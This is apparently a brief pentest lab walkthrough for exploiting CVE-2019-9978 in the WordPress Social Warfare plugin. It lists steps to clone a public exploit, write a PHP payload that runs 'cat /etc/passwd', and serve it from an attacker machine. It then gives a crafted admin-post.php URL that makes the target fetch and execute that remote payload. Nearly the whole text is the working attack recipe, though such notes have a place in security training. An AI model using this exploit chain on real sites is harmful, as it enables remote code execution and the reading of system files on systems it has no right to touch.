Social Warfare
Read /etc/passwd
[1]Git clone the exploit
sudo git clone http://github.com/hash3liZer/CVE-2019-9978.git
[2]Craft a payload.txt and serve on port 8000 using python
<pre>system('cat /etc/passwd')</pre>
[3] Craft malicious url
Target : 192.168.101.174
Kali: 192.168.101.169:8000
http://192.168.101.174/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.101.169:8000/payload.txt
3) Trigger in browser and read /etc/passwd content
Last updated